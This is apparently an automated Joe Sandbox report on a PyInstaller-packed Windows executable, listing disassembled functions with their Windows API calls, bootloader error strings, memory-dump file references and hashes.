                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                          • Instruction ID: 8fb7cf59f246c43d15ad8262180eb5ccab811165baa45798c5ed688da9b7e0e6
                                                                                                                                                          • Opcode Fuzzy Hash: aab7c7e636ea8a2572919ef13f94062ff4905efd63cd4babadd9079b892b9703
                                                                                                                                                          • Instruction Fuzzy Hash: A2D18632A08B4286EB20AF66D4823BDB7A0FB567B8F500136DE4D97755DF38E459CB10
                                                                                                                                                          Function 00007FF714C82C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF714C83706,?,00007FF714C83804), ref: 00007FF714C82C9E
                                                                                                                                                          • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF714C83706,?,00007FF714C83804), ref: 00007FF714C82D63
                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF714C82D99
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Message$CurrentFormatProcess
                                                                                                                                                          • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                                                                                                                          • API String ID: 3940978338-251083826
                                                                                                                                                          • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                          • Instruction ID: 02c775e569dcd5b7fbf024312714f54e75085d093aefde79336c0a0581394cfd
                                                                                                                                                          • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                                                                                                                          • Instruction Fuzzy Hash: 4131C723708E4152E620BF26F8956ABA691BF85BA8F810137EF4D53759EF3CD50AC310
                                                                                                                                                          Function 00007FF714C8DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF714C8DF7A,?,?,?,00007FF714C8DC6C,?,?,?,00007FF714C8D869), ref: 00007FF714C8DD4D
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF714C8DF7A,?,?,?,00007FF714C8DC6C,?,?,?,00007FF714C8D869), ref: 00007FF714C8DD5B
                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,?,?,00007FF714C8DF7A,?,?,?,00007FF714C8DC6C,?,?,?,00007FF714C8D869), ref: 00007FF714C8DD85
                                                                                                                                                          • FreeLibrary.KERNEL32(?,?,?,00007FF714C8DF7A,?,?,?,00007FF714C8DC6C,?,?,?,00007FF714C8D869), ref: 00007FF714C8DDF3
                                                                                                                                                          • GetProcAddress.KERNEL32(?,?,?,00007FF714C8DF7A,?,?,?,00007FF714C8DC6C,?,?,?,00007FF714C8D869), ref: 00007FF714C8DDFF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                          • API String ID: 2559590344-2084034818
                                                                                                                                                          • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                          • Instruction ID: f1a58ed09ab9a11761cf4f6f2334d786e598da160a07e14a9f20ff76e73d5ce7
                                                                                                                                                          • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                                                                                                                          • Instruction Fuzzy Hash: E7318062B1AE4291EE11AF1394815A5A394FF4ABB4F994937DE1D06380EF3CE44A8330
                                                                                                                                                          Function 00007FF714C86360 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                          • API String ID: 2050909247-2434346643
                                                                                                                                                          • Opcode ID: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                          • Instruction ID: 432886de67fae2e5f49b33bb753868102f99c793d11ef8f128c0955a7a93bbae
                                                                                                                                                          • Opcode Fuzzy Hash: bd35b640c02035bc0e077a05b147b005ab0e639f37cafda848bc65a29b3ec2f1
                                                                                                                                                          • Instruction Fuzzy Hash: 55419D32A18E8791EA10EF22E4961E9A351FB867A4FD00133DA5C43695EF3CE60DC760
                                                                                                                                                          Function 00007FF714C82A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF714C8351A,?,00000000,00007FF714C83F1B), ref: 00007FF714C82AA0
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                          • API String ID: 2050909247-2900015858
                                                                                                                                                          • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                          • Instruction ID: 353c6dcc74110da3d4f53afb22da5a3a54c884f01ffcbbac45a274a97c8e3809
                                                                                                                                                          • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                                                                                                                          • Instruction Fuzzy Hash: 60218632618F8292E720AF52F8817E6A794FB857D4F800136FE8D53659EF3CD2498650
                                                                                                                                                          Function 00007FF714C9B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                          • Opcode ID: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                          • Instruction ID: 9430f378be768671762ab185a79d94c9171ba8b202c74868cbfe43b084b7fe10
                                                                                                                                                          • Opcode Fuzzy Hash: a42b9cf7ed1ffe71ebcf97f5a72f2c90d2921d4b6bb9ef7954fc9d2fe8c6feaf
                                                                                                                                                          • Instruction Fuzzy Hash: 1C213D24A08E42B1F9587F27DDD113DD2426F46BF0FD44736D92E466CAFE2DA4488720
                                                                                                                                                          Function 00007FF714CA7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                          • String ID: CONOUT$
                                                                                                                                                          • API String ID: 3230265001-3130406586
                                                                                                                                                          • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                          • Instruction ID: 1ad9703d8c0b647667eea0b2c045ea9431a86097bbd7ce2369e5d184dc79ddbf
                                                                                                                                                          • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                                                                                                                          • Instruction Fuzzy Hash: CE118422A18E4186E750AF13E894329E7A0FB99FF4F500A36DA5E87794EF3CD5188750
                                                                                                                                                          Function 00007FF714C88ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF714C83FA9), ref: 00007FF714C88EFD
                                                                                                                                                          • K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF714C83FA9), ref: 00007FF714C88F5A
                                                                                                                                                            • Part of subcall function 00007FF714C89390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF714C845F4,00000000,00007FF714C81985), ref: 00007FF714C893C9
                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF714C83FA9), ref: 00007FF714C88FE5
                                                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF714C83FA9), ref: 00007FF714C89044
                                                                                                                                                          • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF714C83FA9), ref: 00007FF714C89055
                                                                                                                                                          • FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF714C83FA9), ref: 00007FF714C8906A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3462794448-0
                                                                                                                                                          • Opcode ID: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                          • Instruction ID: c6728b77ccd1d1e6f4992c3ac941136ee6de2f12694a08dd09ac00263ed16dee
                                                                                                                                                          • Opcode Fuzzy Hash: 0184f5a771bb2c28f933eba3e4018dda16e38d059dd6d010c17659477659ba58
                                                                                                                                                          • Instruction Fuzzy Hash: D0417A72619A8381EA30AF13A5812BAB394FB8ABE4F844136DF4D57789DF3CD505C710
                                                                                                                                                          Function 00007FF714C9B2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,00007FF714C94F11,?,?,?,?,00007FF714C9A48A,?,?,?,?,00007FF714C9718F), ref: 00007FF714C9B2D7
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C94F11,?,?,?,?,00007FF714C9A48A,?,?,?,?,00007FF714C9718F), ref: 00007FF714C9B30D
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C94F11,?,?,?,?,00007FF714C9A48A,?,?,?,?,00007FF714C9718F), ref: 00007FF714C9B33A
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C94F11,?,?,?,?,00007FF714C9A48A,?,?,?,?,00007FF714C9718F), ref: 00007FF714C9B34B
                                                                                                                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF714C94F11,?,?,?,?,00007FF714C9A48A,?,?,?,?,00007FF714C9718F), ref: 00007FF714C9B35C
                                                                                                                                                          • SetLastError.KERNEL32(?,?,?,00007FF714C94F11,?,?,?,?,00007FF714C9A48A,?,?,?,?,00007FF714C9718F), ref: 00007FF714C9B377
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Value$ErrorLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2506987500-0
                                                                                                                                                          • Opcode ID: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                          • Instruction ID: 8023354d979bd49087249e44a65438d72dce6ca803512b58e12e4f8aa5bcd285
                                                                                                                                                          • Opcode Fuzzy Hash: 1c08c83365d44066401784e1b70b71c7670d14ff4fb682678828c33d1612b477
                                                                                                                                                          • Instruction Fuzzy Hash: BF113020A0CE52A2F954BF27D9D113DD2466F46BF0FD48736D92E467D6FE2CA4094720
                                                                                                                                                          Function 00007FF714C82910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF714C81B6A), ref: 00007FF714C8295E
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                                                                                          • API String ID: 2050909247-2962405886
                                                                                                                                                          • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                          • Instruction ID: 7879c363b5e69347d535bb986c3240128dfc0d3a45bd7e9fdac5f1e10c5f8bed
                                                                                                                                                          • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                                                                                          • Instruction Fuzzy Hash: D231E923B18E8152E710BF62F8816E6A295BF857E4F800533EE4D43759EF3CD14A8210
                                                                                                                                                          Function 00007FF714C82390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                                                          • String ID: Unhandled exception in script
                                                                                                                                                          • API String ID: 3081866767-2699770090
                                                                                                                                                          • Opcode ID: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                          • Instruction ID: d88e82a28c8b3a3ec2dfb210a1b1e447248ccdf10e16182bc702f37545eabef7
                                                                                                                                                          • Opcode Fuzzy Hash: 851ce5d4a208b56cb63585478e484d0f9d6918564d04618497f061aba15d8534
                                                                                                                                                          • Instruction Fuzzy Hash: 6C318872619E8285EB20EF62E8951F9A360FF85794F940136EA4D47B49EF3CD108C710
                                                                                                                                                          Function 00007FF714C82B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF714C8918F,?,00007FF714C83C55), ref: 00007FF714C82BA0
                                                                                                                                                          • MessageBoxW.USER32 ref: 00007FF714C82C2A
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentMessageProcess
                                                                                                                                                          • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                                                                                          • API String ID: 1672936522-3797743490
                                                                                                                                                          • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                          • Instruction ID: c67d1e271d3434f6fbc96a58a6a05420c685dd5dcbd2228cf5192db391040f63
                                                                                                                                                          • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                                                                                          • Instruction Fuzzy Hash: FD21D173B08F4192E710AF16F8857AAA7A4FB89794F800136EA8D53659EF3CD209C750
                                                                                                                                                          Function 00007FF714C82710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF714C81B99), ref: 00007FF714C82760
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                                                                                          • API String ID: 2050909247-1591803126
                                                                                                                                                          • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                          • Instruction ID: c92ec3fdf3249463f747fb49ac683ed1a99397c5d2dfde9e87e430fc1f3396b0
                                                                                                                                                          • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                                                                                          • Instruction Fuzzy Hash: 3021A632A18F8292E710EF52F8817E6A394FB89794F800536EE8D53659EF3CD1498750
                                                                                                                                                          Function 00007FF714C99A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
